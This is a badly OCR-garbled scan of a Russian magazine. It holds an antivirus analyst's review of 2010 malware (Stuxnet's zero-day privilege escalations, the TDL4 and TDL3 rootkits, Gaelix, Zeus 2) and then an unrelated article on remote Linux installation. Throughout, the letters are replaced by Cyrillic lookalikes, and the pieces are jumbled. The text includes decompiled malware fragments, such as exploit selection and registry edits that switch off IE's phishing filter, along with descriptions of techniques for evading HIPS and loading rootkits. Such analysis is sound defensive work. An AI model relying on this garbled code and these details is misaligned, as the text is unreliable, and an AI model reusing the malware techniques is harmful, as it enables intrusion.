привилегий еще две уязвимости нулевого дня. В зависимости от 
операционной системы происходит выбор подходящего эксплойта 
для повышения привилегий. Всего их два: для ѴѴіп2000/ХР и для 
ѴізІа/ѴѴіп7. 

М510-073 — уязвимость в драйвере ѵѵіп32к.зу5, позволяющая повы- 
сить локальные привилегии под управлением ѴѴіп2000/ХР посред- 
ством выполнения произвольного кода в ядре. Уязвимость работает 
даже под гостевой учетной записью, но реализация шеллкода для 
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роста файловой системы 
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Пример Ілк-файяа, который загружает дропер ЗйіхпеГ 
в систему 



уоііі 5Іс1са11 Ріпс1Токеп(іп1 аі) \ 

{ 

іпі уі ; // ейі@1 
зідпесі хп(: у2; // е5І01 
іпі цЗ; // еах@2 
іпі у 4; // [5р-4П] [Ьр-СП]@5 

уі = СНеск$п»аг1:Саг(1( ) ; 
ір2 = -1 ; 
мПіІе ( 1 ) 
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Зараженный ТОІ.4 МБР 



режима ядра — задача весьма нетривиальная. Впрочем, авторы 
Зіихпеі с ней успешно справились. Заплатка была выпущена толь- 
ко к середине октября. 

(отсутствует Ѵепсіо г- Ю) — уязвимость в планировщике задач (Тазк 
ЗсНесШег), позволяющая повысить локальные привилегии до уров- 
ня 5У5ТЕМ под управлением Ѵіз1;а/ѴѴі п 7/ѴѴі п2008. Для повышения 
привилегии будет достаточно даже прав гостевой учетной записи. 
Уязвимость интересна тем, что она является концептуальной, то 
есть разработчики допустили ее на уровне архитектуры работы 
этого сервиса. Пока она не будет закрыта, мы не можем разглашать 



< 

уЗ = СПескЗтагІСагбО ; 

ІР ( уЗ *= уі || у2 == -1 ) 

< 

у 1 = уЗ; 

ІР ( УЗ ) 

у 4 = С іп I: ) , "&1:океп=1 ” ; 
еІ5е 

у 4 = (іп1)"&1:океп=0" ; 
у 2 = ЗегнШаІаТогеизЗегуег ( у4) ; 

> 

$1еер(ЗО000и) ; 

> 

> 



ЗтагісагсІ АРІ не чужд Зевсу! 

о ней информацию, но мы любезно предоставили результаты наших 
исследований (включая РоС) в МісгозоИ Естественно, нас побла- 
годарили и обещали закрыть уязвимость как можно быстрее, но с 
этого момента прошел уже не один месяц :). 

И напоследок осталась еще одна уязвимость нулевого дня — это 
СѴЕ-201 0-2772, которая была найдена в системах Зіетепз Зітабс 
ѴѴіпСС и РС5 7 5СА0А, и заключается она в жестко прошитом паро- 




іпЕ сйесі вура5зРГіі5ГіРіи:ег( ) 

< 

іпі гееиіі:; // еах@7 

ІЕ ( Йед0реп(НІ{ЕѴ СІІЙЙЕНТ и$ЕЯ * ^'Зй^ЫагеЧЧтісгоза^ІЛЧіііІіегпеі ехрІогегХЧрМізЫпдЕіІІіег'Д Ь^ЕпаЫей* 1 ) > 
П«?дЕйіІ:{НКЕѴ СиВЙЕНТ ІІ5ЕЙ , І_"ЕііаЫе<Г ) ; 

іЕ ( йедОрепіСНКЕѴ СІЖПЕНТ и&ЕП , Е"5оЕІ:маге\\тісго5оЕІ:\\іп!:ег*пеІ: ехр1оге^\\рПі5ПіпдЕі1Ъег м , Е^ЕпаЫейиВ") ) 
йедЕбі^(НКЕѴ_аиВйЕНТ_Іі5ЕВ і (."ЕпаЫесШа" 1 ) ; 

ІЕ ( Нед0реп(НІ(ЕѴ_10САІ__МйСНІНЕ, І^БоЕІшгеХЧтсгоБоЕ^ХМпгегпеЕ ехр1огегѴ\рІй5НіпдЕі1Сег , * > І_ <ѵ ЕпаЫей") ) 
КедЕйІС( НКЕѴ_І_ОСЙІ__МАСН I ИЕ , |_"ЕпаЫе(Г) ; 

ге5и1Е =• йедОреп(НКЕѴ_иосАЕ_МйСНШЕ, и' , 5оЕішаге\\р>ісго5оЕЕ\\іпЕегпеЕ ехрІогегЧЧрПі^МодЕііЕег" , (У'ЕгіаЬІеіШб 11 ) 
ІЕ ( гезиІЕ ) 

гезиІЕ = ЙедЕ(Иі( НКЕѴ_ЮСАІ_НАСНІШ , ІУ ЕпаЫесШв") ; 
геЕигп гезиІЕ; 




Обход фишинговых фильтров для ЛЛ5 Іпіегпеі’ Ехріогег последних версий (для 2еи$) 




УгіЕеЕі1еІпІіпадеС“сЕд _іпі" , 0, _йкР5Ітаде, &$гс* ізЗІ , ТоіаІВІоскБ , &и22 , ѵІЗ); 
УгіЕеЕіІеІпІпадеС^пЬг", 1, НкР^Іпаде* &у 39* 0х2В8и* ТоЕаІВІоскз , &и22, иІЗ); 
У^іЕеЕі^еIпІIпадеС і^ 1^3г16 ,, т 2, ЙкРаІпаде, &Ійг16_йаЕа , Ѳх*і25и я ІоЕа1В1оск5, &ѵ22, уіЗ); 

иггСеРАХеЕпХтадеГ'ХйгЗг 1 *, 3, КкЕзІтаде, &1йг32_баІ:а , ОхСЗЕи, То±а1В1оск5» 6м22, иІЗ); 

у^іЕеЕі1еIпІ!падеС“1(1^64 ,I , -4, йкРБІпаде, &1йгб4_йаіа * ѲхЕ48и, ТоЕа1ВХоск5, &и22 Р ИЗ); 

УгіЕеРіІеІпІтадеГ'йгиЗг" , 5, КкРзІпаде, (сопзЕ иоій *)и32, *м28 я ТоГаІВІоскз * &и22, иІЗ); 

игі!еРі1еІі»Ііпаде( "111*1164", 6, ВкрБІпаде, &йгиб4_(1аі:а , 0х5С04ц, ТоІгаІВІоск* , &и22, иІЗ); 

МгіЕеРі1еІпІіпаде( , ’стй _Й1Г\ 7, КкР^Ітаде, (сопеі: иоій *)(и30 + 4), *(_0Н0Я0 *)иЗВ, ТоЕаІВІоскз 
игіііерііеіпітаде^спнібп.йіі", 8, ВкРБіпаде, &сіп<164_<Іаіа , ѲхЗѲѲѲи, ТоЕа1В1оск5 , &ѵ22, мІЗ); 
УгіЕеРіІеІ п Ішаде ("ЬскРд _ Гтр" , 9 , РкРе Ішаде, &и29->ВиЕЕег , и29->ВиРРег$іге , ТоІ:а1В1оск5 , &у22. 



, &и22 , 

иІЗ) ; 



иІЗ); 



Предусмотрены все возможные варианты установки под различную разрядность систем, чувствуется за плеча- 
ми авторов ТОІ.4 большой опыт подобных разработок 
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ВЕКТОРЫ ПРОНИКНОВЕНИЯ 
5ТУХМЕТ В СИСТЕМУ 



гетоѵаЫе сіеѵісез 
М510-046 

депегаі аПаск ѵесГог 



асИігіопаІІ аііаск ѵесТог 



ІосаІ пеіѵ/огк 

і 



М508-067 



М510-061 



ргорадагіоп 



ЗіихпеТ ргорадаііоп 
апсі іпзіаііаііоп ѵесіогз 
іп ЛЛ5 ѴѴ/іпсІоѵѵз 



іпзіаііаііоп 



\ЛЙп2000/ХР 



М510-073 



ргіѵііеде езсаіаііоп 



ргіѵііеде езсаіаііоп 



4 Г 



Ѵі$Іа/\Л/іп7/5егѵег 2008 

і 



АА510-0ХХ 



ле для доступа к базе данных Місгозоіі 5СН_ из программы ѴѴіпСС. 



ИНТИМНЫЕ ОТНОШЕНИЯ 
ТОІ.З И СЛУЖБЫ ПЕЧАТИ 



Получить 

Привелегию 

5еІ.оасЮгіѵег 



ошибка 



і 



Скопировать 
себя во временный 
каталог 

і 

Создать файл с 
манифестом 

і 

Вызвать 

ЗЬеІІЕхесиІе 



успех 



I 



Скопировать 
себя в каталог 
РгіпіРгосеззог 



1 



Установить флаг 
ІМАОЕ_РИЕ_ОІ± 
в РЕ-заголовке 



і 



Вызвать 

(АббРгіпІРгосеззог) 

АРІ 



і 



Вызвать 

(ОеІеіеРгіпіРгосеззог) 

АРІ 

ВЫБОР ДРАЙВЕРА ДЛЯ ПОСЛЕ- 
ДУЮЩЕГО ИНФИЦИРОВАНИЯ (ДЛЯ ТОІ.З) 



Внутреннее устройство 

Продуманность архитектуры червя Зіихпеі тоже уникальна, масштабы 
реализованного функционала поистине впечатляют: более мегабайта 
выверенного до мелочей объектно-ориентированного кода, ском- 
пилированного одной из последних версий компилятора Місгозоіі: 
Ѵізиаі С++. И это только сам дропер, не считая драйверов с руткит- 
функционалом. Впрочем, в данном случае они ничем драйверы не 
поразили. И все-таки, какая сильная вещь: огромное число экспор- 
тируемых функций, каждая из которых отвечает за свой функционал. 
Используется проверка различных ситуаций, которые могут повлиять 
на процесс выполнения кода червя, продумана каждая мелочь... 
Сетевое взаимодействие с центром управления также выполнено 
на высоком уровне и реализовано в виде собственного протокола 
обмена. 

Помимо этого реализован механизм взаимодействия по протоколу 
Р2Р, который позволяет находить другие зараженные компьютеры в 
локальной сети, обмениваться с ними информацией и даже обнов- 
лять себя, если найдены более новые версии червя. 

Для того, чтобы описать все технические особенности Зіихпеі, не 
хватит и целого журнала. Наш отчет «Зіихпеі ІІпсІег ібе Місгозсоре» 
о проведенном исследовании занимает более 70 страниц, поэтому 
предлагаю остановиться и перейти к следующей части нашего пове- 
ствования :). 

ТОІА 

Я поставил этот руткит на второе место, потому что это един- 
ственный полноценный руткит для х64-систем, который уже успел 
получить широкое распространение. ТОІ_4 представляет собой 
дальнейшее развитие вредоносной программы Т0І_3, которая уже 
не раз упоминалась на страницах журнала. ТО1_4 удается успешно 
обходить защитный механизм проверки цифровой подписи в х64- 
версиях ѴѴіпсІоѵѵз. Авторы его применили довольно изящный способ 
обхода, который заключается в использовании техник заражения 
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МАІЛЛ/АВЕ 



Выполняемые команды 



Подключение карты к устройству 



Отключение карты от устройства 



Инициализация библиотеки функций 



Определение атрибутов карты 



Начало и конец обмена данными 



Определение статуса устройства 



ПРОТОКОЛ ВЗАИМОДЕЙСТВИЯ ЗЕВСА СО СМАРТ-КАРТАМИ 



Регистрация осуществленных 
изменений 



Определение списка доступных 
устройств считывания 



Предоставление доступа к устройству 
считывания 



Отправка карте запроса на получение 
данных 



МБР и старта вредоносного кода раньше самой операционной 
системы. Подобные методологии уже активно применялись таки- 
ми вредоносными программами, как МеЬгооІ, ЗіопесІВооІ и др. А, 
например, Т0І_3 использовала для загрузки вредоносного функцио- 
нала механизм инфицирования системных драйверов без измене- 
ния их размера, но, так как в х64-системах при загрузке драйверов 
проверяется цифровая подпись, авторы от этого механизма отказа- 
лись. 

Итак, теперь заражение осуществляется следующим образом: 

• Открывается описатель физического устройства (в моем случае это 
был \\??\РЬузісаЮгіѵеО), на котором располагается раздел с именем 
«С:»; 

• Подготавливается и записывается в конец жесткого диска образ 
своей файловой системы (унаследованный из Т0І_3 функционал); 

• Перезаписывается МВР-кодом, который осуществляет загрузку 
модулей в ранее подготовленной файловой системе; 



СеіізГісаІе 



СегѵегаІ | оеіаѣ | СегНйсаИоп РаСЬ ) 



СегІіПсаІе ІпГогтаІІоп 

ТЫ$ сегНПсаІге І5 іпЪепсІесІ Гог Ік ГоІІошіпд ригро$е(5): 

♦Еп5иго5 БоГГюаге сате Ггот зоГЬяаге риЫізЬег 
♦РгоЬесЬз гоГГіѵеге Ггот аІЬегаІіоп ѳГЬег риЫісаІІоп 



* КеГег Го ГЬе сегГіГісаГіоп аиГІюііГу'з 5ІаГетепГ Гог с!еГѳі1$, 
1 550 е сі Го: ЯеаІГек 5етіоопсІисГог Согр 

І55иееІ Ьу: Ѵегі5ідп СІ85$ 3 Сосіе 5ідп[пд 2004 С А 

ѴаІісК Ггот 15-03-2007 Ьо 12-06.2010 



ІпйаІІСегІЙсЛе-.. 




1$$иег Біаіенпепі 





• После успешного заражения на х64-системах происходит пере- 
загрузка при помощи вызова ѴѴіпАРІ функции ЕхііѴѴі псіоѵѵзЕхО или 
2ѵѵРаізеНагсІЕггог(). 

В целом этот процесс выглядит следующим образом: 

• ВІ05 считывает первый сектор загрузочного диска и передает 
управление на код главной загрузочной записи МБР. Таким образом 
начинается выполнение кода ТОІ_4; 

• Далее происходит расшифровка кода для дальнейшего его выпол- 
нения, который предназначен для загрузки модуля с именем Ісігіб из 
файловой системы руткита; 

• Загруженный модуль Ісігіб осуществляет перехват прерывания ІЗГі, 
которое отвечает за работу с жестким диском. Основная задача данно- 
го модуля — определить разрядность операционной системы (х32 или 
х64), и, в зависимости от нее, осуществляется загрузка Шг32 или Шг64; 

• Оба модуля, и Иг32 и Шг64, предназначены для загрузки основного 
драйвера Т0І_4, которая осуществляется без использования стандарт- 
ного АРІ, чтобы обойти механизм проверки цифровой подписи; 

• Сначала происходит размещение кода драйвера в памяти по адре- 
сам, принадлежащим ядру ОС. Далее проводится его регистрация 
как драйвера ОС при помощи вызова недокументированной функции 
ІоСгеаІеОгіѵегО. После этого драйвер можно считать загруженным. 
Затем продолжается загрузка операционной системы с драйвером 
ТО І_4 на борту, после старта происходит внедрение вредоносного кода 
в некоторые процессы, и в дальнейшем его поведение очень похоже 
на предыдущую версию — ТОІ_3. 

ТОІЗ 

Этот участник нашего рейтинга должен быть уже хорошо знаком 
читателям, так как он представляет собой истинный шедевр из 
области системного программирования, претерпевший, к тому же, 
несколько реинкарнаций. Здесь речь пойдет о последней рас- 
пространенной версии этого руткита, а точнее — о версии 3.273. 
Обновление своего функционала ТОІ_3 получил в начале 2010 года, 
а весной было исправлено несколько ошибок (одна из них — несо- 
вместимость руткит-драйвера с одним из патчей от М5 :)) и исполь- 
зован еще один ранее неизвестный прием обхода НІРЗ-систем. 

А теперь предлагаю перейти к описанию собственно технических 
изысков ТОЮ. 

Обход НІР5-систем 

Использование ѴѴіпАРІ -фун кци й АсІсІРгіпіРгосеззог и 
АсИРгіпіРгоѵісІог, которые не контролировались большинством 
НІРЗ-систем, дало возможность беспрепятственной установки в 




Сертификат ЗІихпеТ 
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И- ЯГ *"■»— Антиэмуляция 2~Г‘ Е 



Инфицирование 

МВР 



5+ихпе* 


+ 


+ 


- 


+ 


- 


- 


ТОІ.4 


+ 


+ 


+ 


+ 


- 


+ 


1013 


+ 


+ 


+ 


+ 


+ 


- 


йаііхі 


+ 


+ 


+ 


+ 


- 


+ 


2еи$2 


- 


+ 


+ 


+ 


+ 


- 



СРАВНИТЕЛЬНАЯ ТАБЛИЦА ВОЗМОЖНОСТЕЙ ЗЛОВРЕДОВ 



спаг зюсаіі і?игсЕнріоі[ьТоЕіеѵаИЕ'Ргіиіі 0 деь(іпі: РіЮаЕа, іпі ЕхріоіИТуре) 

{ 

ВйТйнигРЕИО миг; // есхео 

спаг гкиіс; // зіѲ2 

іііі ЯиГіііііаесогиіа; // езіЕЗ 

0ЙТЙ Н1ІЕРЕВ 0 *КІ5; // [Ер + ОГі] [Ьр-1ОГі]01 

іпи иб; // [зр+сп] [Бр-ііГі]03 

и5 - ѵ2; 

ІР ( ЕХрІОІСТуре ==■ э } 
гб^игг» В; 

СО е* и Е> а I а_Й с ди і Г у I Іи I 0» ( Ьи5 > ; 

иб ° В ; 

сІиМі 1 1 ізес и гггі з = СО ес ВЗ ЕЭ_С е I ОесгурЪ Ва ( а Ои РР 0г ( ) - > Т і пеТ 05 1 и ер ; 
иб = -1; 

_С Ве цр а Е а_Ве1 еа МУ к ( Л ѵ 5 > ; 

$ 1 еер( 0 мНі 11 і&і?сдпгі 5 ); // 5 Іеер зресіРіесі Нпе 

// 0 е Роге гшшіпд ехріоііз 

ІР ( ЕхрІоіЕТуре ) 

< 

ІР С ЕхрІоИгТуре 1 > // о^Ііегмізе 

геіигп в: 

гезиП - Ехр1оі(гТв5к5сІіе(іи1ег(І>110э1:а) ; // Міпгісиз Оізіа. 7, 5егѵег 2008 

> 

еІ5е 

{ 

гезиіі - Ехр1оі!:Ыіп32к0гіоег(В11І>а<:а) : // Міпгіомз ХР ог Ыіпгіоиз 2000 

геіигп гезіііі; 



Декомпилированный в Нех-Рау$ код, демонстрирую- 
щий выбор наиболее подходящей уязвимости 

систему злонамеренного кода в обход многих антивирусных систем 
и не только. Дело в том, что, как правило, защита основана на сле- 
дующем принципе — прикрываются известные бреши, а остальное 
латается на ходу. Это, конечно, дает эффект защиты от распростра- 
ненных типовых угроз, но, как показывает практика, вероятность 
появления технологичных вредоносных программ далеко не нуле- 
вая. Вот и в нашем случае авторам ТйІ_3 удалось найти доверен- 
ные функции, которые никем не контролировались и давали воз- 
можность установить руткит в систему. 

ВООЬ АсІсІРгіпЕРгосеззог ( 

іп ЬРТЗТК рЫате , 

іп ЬРТЗТК рЕпѵігоптепЬ , 

іп ЬРТЗТК рРаЬШате, 

іп ЬРТЗТК рРгіпЬРгосеззогЬате 

) ; 



И: 



ВООЬ АйсІРгіпЬРгоѵісІог ( 

іп ЬРТЗТК рЬате, 

іп ШОКВ Ьеѵеі , 

іп ЬРВУТЕ рРгоѵісІегІпііо 

) ; 

Процесс установки ТОІ_3 можно разделить на две стадии: 

• Регистрация вспомогательной библиотеки службы печати; 

• Загрузка драйвера режима ядра. 

Для того, чтобы зарегистрировать вспомогательную библиотеку служ- 
бы печати, необходимо обладать привилегией 5Е_І_0А0_0ПІѴЕР_ 



РРІѴІІ_ЕѲЕ, позволяющей загружать/выгружать драйверы. Чтобы 
получить данную привилегию, дропер вызывает ѴѴіпАРІ- функцию 
РиАсфизіРгіѵіІде. Если вызов данной функции осуществлен успешно, 
дропер копирует себя в %РгіпіРгосе550г% каталог в качестве динами- 
ческой библиотеки и осуществляет вызов функции АббРгіпіРгосеззог/ 
АббРгіпіРгоѵібог, передавая ей в качестве параметра имя скопиро- 
ванной библиотеки и строку ДбГ. Данный вызов посредством ПРС- 
механизма заставляет службу печати загрузить указанную библиотеку 
и вызвать ее точку входа (смотри на картинке). 

Вот таким изящным способом ТОІ_3 удалось миновать большинство 
систем защиты на этапе установки. Конечно, сейчас про это уже 
знают все антивирусные компании и так или иначе пытаются обнару- 
живать этот способ установки вредоносных программ. 

Инфицирование системных драйверов 

И снова авторам ТОІ_3 удалось удивить вирусных аналитиков. На 
самом деле ухищрение в виде заражения системного драйвера пона- 
добилось для того, чтобы помочь руткиту выжить после перезагрузки 
системы, поскольку прописывать себя в явном виде в ветку автозапу- 
ска — это слишком большой риск быть обнаруженным еще до первой 
перезагрузки системы. 

Ранние версии ТОІ_3 заражали строго определенный файл — драйвер 
минипорта жесткого диска, на котором располагается ОС. Но авторы 
пошли дальше и решили усложнить процедуру удаления руткита из 
системы — теперь он заражает случайно выбранный драйвер. 

Выбрав драйвер для заражения, инфектор внедряет в него загрузчик 
ТОІ_3 (небольшой фрагмент кода, задачей которого является загрузка 
тела руткита с диска и передача ему управления). 

Интересным моментом является тот факт, что модификация драйвера 
происходит без изменения его изначального размера. 

Собственная файловая система 

Еще одной интересной особенностью Т0І_3 является реализация 
собственной файловой системы. Которая, хотя и идет в нашем спи- 
ске последним номером, по своей значимости является одной из 
основных функций, усложняющих жизнь разработчикам антивирус- 
ных средств защиты. Файловая система создается при заражении 
системы и она используется для скрытого хранения следующих 
данных: 

• модулей для внедрения в процессы ({сИстсЫЩ; 

• конфигурационной информации (сопбд.іпі); 

• тела руткита (ісЩ; 

• перезаписанных ресурсов зараженного драйвера (гзгс.сіаі;); 

• дополнительных файлов загруженных по сети. 

Свою файловую систему, которая начинается с последнего логиче- 
ского блока диска (то есть с последнего сектора) и растет к его нача- 
лу, ТОІ_3 располагает в конце жесткого диска, так что теоретически 
она может перезаписать данные операционной системы. 

С целью автоматизации получения доступа к этой скрытой файловой 
системе у нас в вирлабе была разработана специальная утилита Нсі. 
ехе (ТсЦРзРитрег, ЬирУ/ртрЛсЙ сіитр ). Она распространяется сво- 
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бодно и весьма полезна для быстрого получения доступа к хитрой 
Р8 и извлечения из нее данных. 

йаііхі 

Под номером четыре у нас идет китайское народное творчество 
в области буткитостроения. Жители поднебесной в этом году не 
раз демонстрировали свои силы в этом нелегком деле, но именно 
Оаііхі запомнился нам интересной технологией обхода НІР8 при 
инсталляции в системе. Перед установкой своих компонентов 
эта вредоносная программа восстанавливает таблицу системных 
сервисов ядра, а также нейтрализует саІІЬаск-процедуры, вызы- 
ваемые ядром при создании потока или процесса и отображении 
исполняемых образов в его адресное пространство. Последние 
активно используются различными НІР8 и антивирусными про- 
дуктами для детектирования вредоносного кода (данные про- 
цедуры регистрируются с помощью соответствующих функций: 
РзЗеИоасИтадеЫоб^уРоибпе, РзВеБСгеаБеРгосеззІМоБііуРоиБіпе, 
РзСгеаБеТЬгеасІМоІйуРоиБіпе). Примечательным является тот факт, 
что эти действия совершаются кодом, работающим в пользова- 
тельском адресном пространстве. Для этих целей Оаііхі использует 
недокументированную функцию ХѵѵВузІетОеЬидСопІхоІ., экспорти- 
руемую модулем пШ.сІІІ. 



БТ8У8АРІ 

БТ8ТАТБ8 

БТАРІ 

ББЗузБетБеЪидСопБгоІ ( 

ІБ ЗУЗБВС_СОММАББ 
ІБ РѴОІБ 
ІБ ББОБС 
ОБТ РѴОІБ 
ІБ ББОБО 
ОБТ РББОБС 

) ; 



Сошшапсі, 

ІприБВиББег ОРТІОБАБ, 

I приБ Ви Б Б ег БепдББ , 
ОиБриБВиБ Бег ОРТІОБАБ, 
ОиБриБВиБ БегБепдБЬ. , 
КеВигпБепдБЪ. ОРТІОБАБ 



Забавно, что при поиске в интернете по ключевому слову 
«8у50ЬдСоруМетогуСЬипк5_1» находятся одни китайские ресурсы 
и, кстати, хочу заметить, — со вполне пристойным описанием. 
Процедура ЖВузІетВеЬидСопІхоІ в качестве первого параметра 
принимает номер команды, в случае с Оаііхі используется коман- 
да 8узВЬдСоруМетогуСЬипкз_1 , осуществляющая копирование 
буфера из пользовательского адресного пространства в адресное 
пространство ядра. При использовании данной команды в качестве 
параметра ІприіВи^ег передается указатель на структуру, описываю- 
щую соответствующие буферы и их размер: 



БуреБеБ зБгисБ _СРУ_МЕМ_СНББСК8_ВБРРЕК 
{ 

ѵоіБ *БезБіпаБіоп; 

// роіпБег Во кегпеІ-шоБе БезВіпаВіоп ЬиББег 
ѵоіБ * Зоигсе; 

// роіпБег Во изег-шосЗе зоигсе ЬиББег 
ББОБС Зіге; 

// зіге оБ ВЬе изег-шоБе зоигсе ЬиББег 
} СРУ_МЕМ_СНББСК8_ВБРРЕК , * РСРУ_МЕМ_СНББСК8_ВБРРЕК ; 



Для того, чтобы восстановить исходную таблицу системных сервисов, 
Оаііхі отображает образ ядра в пользовательское адресное про- 
странство, инициализирует таблицу с учетом таблицы перемещае- 
мых элементов и перезаписывает с помощью нее таблицу системных 
сервисов в ядре. Аналогичным образом нейтрализуются саІІЬаск- 
процедуры. 

2еиз 2.х.х 

За свою универсальность и продолжительность жизни заслу- 
женное пятое место получает вторая версия Хе из. Эволюция 



этой троянской программы продолжается уже несколько лет, 
а ее участие было официально подтверждено в достаточно 
большом количестве громких краж кругленьких сумм с боль- 
шим количеством нулей (чего стоит один только инцидент 
с британскими банками). Поражает своим многообразием и 
состав модулей, с которым распространяется Хе из, начиная от 
целевых расширений под конкретные платежные системы и 
заканчивая возможностью установки ѴІЧС или модуля отправки 
оповещений на указанную учетную запись ^ЬЬег. Еще одной 
интересной функциональной особенностью является наличие 
функционала для кражи X. 509-сертификатов с соответствующи- 
ми секретными ключами, которые, как правило, используются 
для осуществления процедуры цифровой подписи, в том числе 
и для исполняемых модулей. Работает это хозяйство с исполь- 
зованием стандартной функции СгурБоАРІ РРХІтрогіСегіЗіоге 
для импорта сертификатов (этот же функционал присутствовал 
и в первой версии). 

НСЕКТЗТОКЕ ШБАРІ РРХІшрогБСегБЗБоге ( 

іп СКУРТ_БАТА_ВБОВ *рРРХ, 

іп БРСБЗТК згРаззѵгогБ, 

іп БШЕБ БѵБРІадз 

) ; 

В антивирусных кругах бытует мнение, что, возможно, именно при 
помощи Іе из были украдены сертификаты, использованные для 
подписания модулей червя ЗіихпеЕ 

Ежедневно наша вирусная лаборатория обрабатывает 
несколько тысяч сэмплов, являющихся геиз-ботами. Все 
распространенные антивирусные средства успешно справля- 
ются с их обнаружением и деактивацией, но, тем не менее, 
количество ежедневных инцидентов по-прежнему велико. 

В общем, это настоящий комбайн для кражи персональ- 
ных данных, а модули расширения делают его поистине 
универсальным инструментом в руках киберпреступников. 
Информации о второй версии Хейз в интернете уже доста- 
точно много, но хотелось бы обратить внимание читателя на 
присутствие некоторых интересных нюансов, таких как обход 
фишинговых фильтров для М8 I п Бе гп еБ Ехріогег последних 
версий. Или, например, удаление всех файлов пользователя 
по команде из центра управления, а также снятие скриншота 
экрана в заданный момент времени. Главной особенностью 
является то, что покупатель может заказать разработку моду- 
ля, который будет заточен исключительно под его задачи. 
Именно за свою гибкость и продуманность с точки зрения 
коммерческого продукта Хейз попадает на пятое место в 
нашем рейтинге. 

Кстати, не так давно нами была проанализирована интересная 
модификация Зевса, которая позволяла через командный центр 
удаленно обращаться к устройствам различного рода смарт-карт 
при помощи встроенного Етагісагсі АРІ. 

На данный момент дело, начатое Хейз, активно осваивается 
автором 8руЕуе, который набирает обороты и, кто знает, может 
быть, в следующем году именно он удивит нас чем-нибудь 
интересным. Количество активных С&С для этого бота растет с 
каждым днем, причем на данный момент большая их часть нахо- 
дится на Украине, в России и странах СНГ. 

Заключение 

С каждым годом мы наблюдаем все большее усложнение функ- 
ционала вредоносного ПО. В первую очередь это связано с 
совершенствованием механизмов обхода защитных средств и 
увеличением времени жизни каждой конкретно взятой заражен- 
ной машины. В этой статье мне удалось осветить лишь малень- 
кий слой того многообразия различных приемов, которые встре- 
чаются нам каждый день при анализе вредоносных программ, □с 
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Устанавливаем Ыпих и ВЗО удаленно 



• Мы все привыкли думать, что для установки новой ОС на машину 
требуются как минимум две составляющие: сама машина и физический 
носитель, на котором записан инсталлятор операционной системы. 

К счастью, это не всегда так. В тех ситуациях, когда физический доступ 
к компу невозможен, вполне можно обойтись и без второго компонента. 



Традиционно, для установки операционной 
системы на комп принято использовать 
специальныеустановочные диски или другие 
носители, которые умеют самостоятельно 
загружаться и передавать управлениеза- 
писанному на них установщику. Это простой, 
удобный и эффективный способ водрузить 
ОС на машину, однако он применим далеко 
не всегда. Иногда мы оказываемся в та кой 
ситуации, когда физический доступ к машине 
просто невозможен. Это может быть уда- 
ленный сервер, машина друга, живущего в 
другом городе, или что угодно еще. Главное 
в такой ситуации то, что подопытный комп 
доступен только по сети, и на нем обычно уже 
установлена какая-то операционка (напри- 
мер, ѴѴіпсІоѵѵз). А вопрос заключается в том, 
как заменить ее на нечто другое (например, 



Ыпих), причем сделать это без участия треть- 
их лиц. 

Хитрые трюки 

Самый простой вариантустановить ОС 
без использования физического носителя 
— воспользоваться возможностями вирту- 
альной машины. Практически любая из них 
позволяет подсунуть в качестве виртуального 
настоящий жесткий диск, тем самым откры- 
вая поистине безграничные возможности для 
экспериментов. Это абсолютно безопасный и 
проверенный временем прием, который мы 
во всех подробностях рассмотрим позднее. 
Более предпочтительный сценарий — ис- 
пользовать инструменты быстрой установки 
Бі п их, которые предоставляют возможность 
инсталлировать пингвина прямо из ѴѴіпсІоѵѵз 



без какого-либо вмешательства со стороны 
пользователя. Наиболее известный из 
таких инструментов носит имя ІІІЧеіЬооІіп 
( ипеіЬооІіп.зоигсеБгде.пеІ: ) и первона- 
чально разработан для создания загружае- 
мых ІІЭВ-флешек с пингвином на борту, но 
позднее научился устанавливать полно- 
ценные дистрибутивы прямо на жесткий 
диск. Подобные утилиты есть в арсенале 
таких дистрибутивов, как ІІЬипІи ( ѵѵѵѵѵѵ. 
иЬипІи.сот/сІезкІор/деІ-иЬипІиА/ѵіпсІоѵѵз- 
іпзІаГег ) и ОрепБІІЭЕ ( еп.орепзизе.огд/ 
ІпзНих ). но до возможностей ІІІЧеіЬооІіп им 
далеко (последний умеет ставить несколь- 
ко вариантов Ыпих, В50, легко поддается 
настройке и может работать в Ыпих). Те, кто 
любят все делать руками, могут воспользо- 
ваться дгиЬ4бо5 и 150-образами соот- 
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Выбираем сетевой источник установки РгееВЗЭ 





Главное — не забыть указать дефолтовый вариант 
меню загрузчика ѴѴіпсІоѵѵз 



ветствующих дистрибутивов. Этот вариант мы тоже рассмотрим. 
Еще проще все это проделать в том случае, когда на машине уже 
установлена II N IX- подобна я ОСь, а задача состоит в том, чтобы 
заменить ее другим представителем семейства II N IX (например, 
установить В5й или другой Ыпих-дистрибутив). Для этого подой- 
дет все тот же ШМеіЬооІіп, либо вариант с загрузкой 150 -об раза 
или минимального образа іпіігсі-средствами ОгиЬ (его можно 
установить из портов В50). 

От ѴѴіпсІоѵѵз к Ыпих. 

Виртуальная машина 

Как я уже упоминал, самый простой и очевидный способ удален- 
ной установки ОС заключается в использовании виртуальной 
машины. Он сработает в любой ОС, где может быть запущена ВМ, 
поэтому даже если на удаленной стороне стоит Зоіагіз или еще 
большая экзотика, выход есть. В своей работе мы будем исполь- 
зовать прекрасную ВМ ѴИиаІВох, которую можно абсолютно 
бесплатно скачать из Сети ( ѵѵѵѵѵѵ.ѵИиаІЬох.огд ). Нас интересует 



версия для ѴѴіпсІоѵѵз, поэтому файлом для скачивания будет 
ѴИ и а ІВ ох-3.2.1 0-66523-ѴѴіп.ехе. 

Сразу после установки запускать виртуальную машину не нужно, 
сначала следует подготовить псевдо-образ жесткого диска, 
который будет ссылаться на настоящий диск. Сделать это можно 
только с помощью консольных утилит, поэтому открываем коман- 
дую строку и пишем: 

> ссі с:\Ргодгат Рі1ез\0гас1е\ѴігкиаІВох 

> ѴВохМападе іпкегпаісоттапсіз сгеаВегаѵ^ѵшсік \ 

-Ёііепате с : \геа1М. ѵтсік \ 

-гачжіізк \ \ . \РкузісаІБгіѵеО -гедізкег 

Образ геаІМ. ѵтсік, расположенный в корне диска С:, будет ссы- 
латься на физический диск (\\.\РЬузіса Ю гіѵеО в нотации ѴѴіпсІоѵѵз], 
опция '-гедізіег' позволяет сразу добавить его в «Менеджер вир- 
туальных носителей» ѴИиаІВох. Забегая вперед, скажу, что то же 
самое в Ыпих можно проделать с помощью похожей команды: 

$ зисіо ѴВохМападе іпВегпаІсоіштапсІз \ 

сгеаВегаѵп/тсІк -Ёііепате ~ / геаІМ. . ѵтсік \ 

-гаѵ/сіізк /сіеѵ/зсіа -гедізкег 

Теперь можно скачать 150-образустанавливаемого Ыпих-дистрибу- 
тива и выделить для него место на диске. Сделать это можно, умень- 
